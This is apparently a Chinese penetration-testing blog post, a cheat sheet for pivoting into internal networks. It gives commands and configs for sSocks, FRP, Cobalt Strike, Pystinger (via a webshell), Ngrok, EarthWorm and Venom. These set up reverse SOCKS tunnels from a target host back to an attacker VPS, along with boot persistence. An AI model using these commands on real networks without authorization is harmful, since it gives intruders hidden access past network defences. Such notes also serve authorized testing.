内网流量代理
ssooking Lv5

sSocket

下载地址:https://sourceforge.net/projects/ssocks/

​ 一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务。

vps监听1088端口:

1
rcsocket.exe –l 1088 –p 8888 –vv

内网目标机器执行:

1
./rssocks –vv –s VPSip:8888

FRP

frp下载链接:https://github.com/fatedier/frp/releases

frps上传到服务器上;frpc是要放到目标机上。

1、配置服务端

修改frps.ini服务器端配置文件

1
2
[common]
bind_port = 10800

2、配置客户端

修改frpc.ini客户端配置文件:

1
2
3
4
5
6
7
8
9
10
[common]
server_addr = 110.120.90.80
server_port = 10800

[socks5]
type = tcp
remote_port = 10800
plugin = socks5
use_encryption = true
use_compression = true

3、启动

1
2
3
4
先启动服务端:./frps -c ./frps.ini
再启动客户端:./frpc -c ./frpc.ini

nohup sudo ./frps -c frps.ini > log 2>&1 &

4、设置代理工具,连接到vps公网ip的10800端口

5、开机自启

Linux环境下,frp只能通过systemd方式自启。

frp_0.34.3_linux_amd64.tar.gz 解压之后可以看到一个 systemd 目录,将其中的 frps.service 文件复制到服务器的 /etc/systemd/system/ 目录下,并修改 ExecStart=/usr/local/frp/frps -c /usr/local/frp/frps.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[Unit]
Description=frpc
Wants=network-online.target
After=network.target network-online.target
Requires=network-online.target

[Service]
ExecStart=/home/pi/github/frp_0.33.0_linux_arm/frpc -c /home/pi/github/frp_0.33.0_linux_arm/frpc.ini
#ExecStart=/home/pi/github/frp_0.33.0_linux_arm/run.sh
ExecStop=/bin/kill $MAINPID
Restart=always
RestartSec=5
StartLimitInterval=0

[Install]
WantedBy=multi-user.target

命令

1
2
3
4
#重新加载配置文件
sudo systemctl daemon-reload #service文件改动后要重新reload一下(类似刷新到缓存里)
sudo systemctl enable frp.service #设置开机启动
sudo systemctl status frp.service #查询自启状态

CobaltStrike

1
beacon > socks 1024 #端口根据VPS实际情况进行设置

Cs菜单栏View > Proxy Pivots,复制代理连接到Metasploit中,或直接将socks4a挂在相关安全工具中。

Pystinger

Pystinger

毒刺(pystinger)通过webshell实现内网SOCK4代理, 端口映射.
可直接用于metasploit-framework, viper, cobalt strike上线.
主体使用python开发, 当前支持php, jsp(x), aspx三种代理脚本.

  1. 上传代理脚本到目标服务器

  2. 在目标主机执行命令开启stinger_server服务

    1
    2
    3
    4
    5
    # Windows
    start stinger_server.exe

    # Linux
    chmod +x stinger_server && ./stinger_server
  3. 在公网vps上执行命令打通隧道

    1
    ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  4. 此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理

  5. 此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020

  6. 用proxychains验证socks4a代理是否工作正常

Sunny-Ngrok

官网链接:http://ngrok.cc/

支持HTTPS、TCP、UDP流量转发。使用方式参考官方文档

  1. 首先在Ngrok官网进行账号注册
  2. 注册完进入系统,访问开通隧道,选择免费服务:
  3. 进行隧道配置
    1. 隧道协议
    2. 隧道名称:随意
    3. 前置域名:随意,默认域名后缀为ngrok.cc
    4. 本地端口
  4. 配置完毕并添加后,服务器自动分配了一个免费域名用于与目标站点进行映射
  5. 在隧道管理中,点击”客户端下载”,并将客户端工具sunny.exe上传至目标服务器
  6. 在目标服务器执行sunny,建立隧道连接:sunny.exe clientid 隧道id
  7. 此时在公网访问 Ngrok 服务器分配给我们的域名即可访问到服务器。

类似的一个,不过仅支持HTTP(s)和WSS协议:https://natapp.cn/

Earthworm

官网链接:http://rootkiter.com/EarthWorm/

正向socks5代理

1
./ew -s ssocksd -l 1080

直接代理工具直接设置为目标IP的1080端口即可

反向socks5代理

公网VPS添加隧道,把本地1080端口收到的代理请求转交给8888端口

1
./ew_linux_x64 -s rcsocks -l 1080 -e 8888

目标主机开启反弹socks服务,连接公网机器

1
./ew_linux_x64 -s rssocks -d 公网VPS的IP -e 8888

现在通过公网VPS主机的8888端口可以直接访问内网

多级代理

参考官网文档。

venom

官网链接:https://github.com/Dliv3/Venom

多级网络流量代理工具,可进行端口转发、端口复用、交互式shell等。

admin/agent命令行参数

  • admin节点和agent节点均可监听连接也可发起连接

    admin监听端口,agent发起连接:

    1
    ./admin_macos_x64 -lport 9999
    1
    ./agent_linux_x64 -rhost 192.168.0.103 -rport 9999

    agent监听端口,admin发起连接:

    1
    ./agent_linux_x64 -lport 8888
    1
    ./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
  • 节点间通信加密

    Venom提供节点间通信加密功能,用户可通过-passwd选项指定密码,该密码用于生成AES加密所需的密钥。

    1
    2
    3
    4
    5
    # 通过-passwd指定密码为dlive@dubhe
    ./admin_macos_x64 -lport 8889 -passwd dlive@dubhe

    # agent指定相同的密码与admin节点连接
    ./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe

参考

  • Post title:内网流量代理
  • Post author:ssooking
  • Create time:2020-05-18 11:18:00
  • Post link:https://ssooking.github.io/2020/05/内网流量代理/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.